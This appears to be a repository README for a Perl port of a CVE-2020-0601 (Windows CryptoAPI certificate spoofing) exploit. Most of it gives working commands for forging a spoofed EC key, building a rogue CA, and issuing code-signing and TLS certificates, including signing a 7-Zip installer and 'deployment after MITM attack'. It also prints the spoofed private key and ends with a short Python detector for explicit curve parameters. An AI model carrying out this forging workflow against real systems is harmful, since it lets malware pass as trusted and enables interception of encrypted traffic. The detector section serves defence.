Repository contents:

  • Crypt32
  • MITM
  • logo
  • working_certs
  • EC.cer
  • README.md
  • openssl_cs.conf
  • openssl_tls.conf
  • shibazuki.pl

README.md

CVE-2020-0601

This is a Perl port of the main.rb script published by ollypwn at https://github.com/ollypwn/CVE-2020-0601

  • Info:
    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601
    https://www.guru3d.com/news-story/microsoft-patches-crypt32-dll-vulnerability-that-allows-certificate-spoofing.html
    https://kb.cert.org/vuls/id/849224/
    https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
    https://www.virustotal.com/gui/file/95597ed5ed579d4fe1e9a2177c29178038e4f837998bc058c94ede6ec55b7547/details
    https://tehtris.com/en/cve-2020-0601-vulnerability-in-the-cryptoapi-of-windows-crypt32-dll/
  • Microsoft Servers: Create ECC CSR and Install ECC SSL Certificate:
    https://www.digicert.com/ecc-csr-creation-ssl-installation-microsoft.htm


Need to install:

```bash
cpan -i Crypt::OpenSSL::X509
cpan -i Crypt::PK::ECC
```

Example of a number of the ECC Certificate:


Usage on Linux (default):

```bash
perl shibazuki.pl ./EC.cer > spoof.key

openssl req -new -x509 -key spoof.key -out spoof.crt
```

# Building

Interactive prompt from `openssl req -new -x509` (example answers):

```
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:BG
State or Province Name (full name) [Some-State]:Sofee
Locality Name (eg, city) []:Sofee
Organization Name (eg, company) [Internet Widgits Pty Ltd]:sec
Organizational Unit Name (eg, section) []:sec
Common Name (e.g. server FQDN or YOUR name) []:nu11secur1ty
Email Address []:tarator@abv.bg
```

```bash
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

openssl req -new -key cert.key -out cert.csr -config openssl_cs.conf -reqexts v3_cs

openssl x509 -req -in cert.csr -CA spoof.crt -CAkey spoof.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_cs.conf -extensions v3_cs

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoof.crt -name "Code Signing" -out cert.p12
```

# install osslsigncode

```bash
apt install osslsigncode
# Info: https://en.wikipedia.org/wiki/PKCS_12
```

```bash
osslsigncode sign -pkcs12 cert.p12 -n "Signed by nu11secur1ty" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe
```


# SSL/TLS

```bash
perl shibazuki.pl ./EC.cer > spoof.crt

perl shibazuki.pl ./EC.cer > spoof.key

openssl req -new -x509 -key spoof.key -out spoof.crt

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls

openssl x509 -req -in cert.csr -CA spoof.crt -CAkey spoof.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls
```

  • Create spoof certificate

```bash
perl shibazuki.pl EC.cer
# Export
perl shibazuki.pl EC.cer > spoof.crt
perl shibazuki.pl EC.cer > spoof.key
```

  • Check

```bash
cat spoof.key
```

The output should look like this, before the certificate is created:

```
-----BEGIN EC PRIVATE KEY-----
MIIBMgIBAQQBAaCB4zCB4AIBATAsBgcqhkjOPQEBAiEA/////wAAAAEAAAAAAAAA
AAAAAAD///////////////8wRAQg/////wAAAAEAAAAAAAAAAAAAAAD/////////
//////wEIFrGNdiqOpPns+u9VXaYhrxlHQawzFOw9jvOPD4n0mBLBEEEdFZqveAI
TciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oSwlYwaceemvGBdLcJ
KqCO1KEZz+oQaQIhAP////8AAAAA//////////+85vqtpxeehPO5ysL8YyVRAgEB
oUQDQgAEdFZqveAITciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oS
wlYwaceemvGBdLcJKqCO1KEZz+oQaQ==
-----END EC PRIVATE KEY-----
```
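An added defensive check, not part of this repository: the script below walks the DER of a PEM key or certificate and flags explicit EC curve parameters (the X9.62 FieldID OIDs that never appear when a curve is named by a single OID), which is what makes the spoof.key above stand out from a normal ECC key. The named-curve sample is a constructed ASN.1 skeleton, not a real key.

```python
import base64
import re

# DER OID contents that only occur inside an explicit ECParameters FieldID
# (X9.62 / RFC 5480). A sound cert or key names its curve with one OID instead.
ID_PRIME_FIELD = bytes.fromhex("2a8648ce3d0101")     # 1.2.840.10045.1.1
ID_CHAR_TWO_FIELD = bytes.fromhex("2a8648ce3d0102")  # 1.2.840.10045.1.2

def pem_to_der(pem: str) -> bytes:
    """Strip PEM armour lines and base64-decode the body."""
    body = re.sub(r"-----[A-Z ]+-----", "", pem)
    return base64.b64decode("".join(body.split()))

def _tlvs(buf: bytes, start: int, end: int):
    """Yield (tag, value_start, value_end) for each DER TLV in buf[start:end]."""
    pos = start
    while pos < end:
        tag, length = buf[pos], buf[pos + 1]
        pos += 2
        if length & 0x80:  # long form: low bits give the number of length bytes
            n = length & 0x7F
            length = int.from_bytes(buf[pos:pos + n], "big")
            pos += n
        yield tag, pos, pos + length
        pos += length

def uses_explicit_ec_params(der: bytes) -> bool:
    """True if a cert, SPKI, PKCS#8 or ECPrivateKey DER carries a FieldID OID."""
    stack = [(0, len(der))]
    while stack:
        start, end = stack.pop()
        for tag, vs, ve in _tlvs(der, start, end):
            if tag == 0x06 and der[vs:ve] in (ID_PRIME_FIELD, ID_CHAR_TWO_FIELD):
                return True
            if tag & 0x20:  # constructed (SEQUENCE, [0], ...): descend into it
                stack.append((vs, ve))
    return False

# Sample 1: the spoof.key printed in this README (explicit parameters).
SPOOF_KEY_PEM = """-----BEGIN EC PRIVATE KEY-----
MIIBMgIBAQQBAaCB4zCB4AIBATAsBgcqhkjOPQEBAiEA/////wAAAAEAAAAAAAAA
AAAAAAD///////////////8wRAQg/////wAAAAEAAAAAAAAAAAAAAAD/////////
//////wEIFrGNdiqOpPns+u9VXaYhrxlHQawzFOw9jvOPD4n0mBLBEEEdFZqveAI
TciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oSwlYwaceemvGBdLcJ
KqCO1KEZz+oQaQIhAP////8AAAAA//////////+85vqtpxeehPO5ysL8YyVRAgEB
oUQDQgAEdFZqveAITciI3055WctITTdkFuNK/2Rc+uCJNK+xFcDOFuSjbFzQ/6oS
wlYwaceemvGBdLcJKqCO1KEZz+oQaQ==
-----END EC PRIVATE KEY-----"""
# Sample 2: constructed ECPrivateKey skeleton naming secp256r1 (not a real key).
NAMED_CURVE_DER = bytes.fromhex("3012020101040101a00a06082a8648ce3d030107")
```

Running `uses_explicit_ec_params(pem_to_der(open(path).read()))` over a CA or leaf certificate exported from a TLS session or a signed binary gives True only when the certificate ships its own curve parameters; a public root or intermediate should never do that.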

Deployment after MITM attack ;)

Already created, spoof cert:
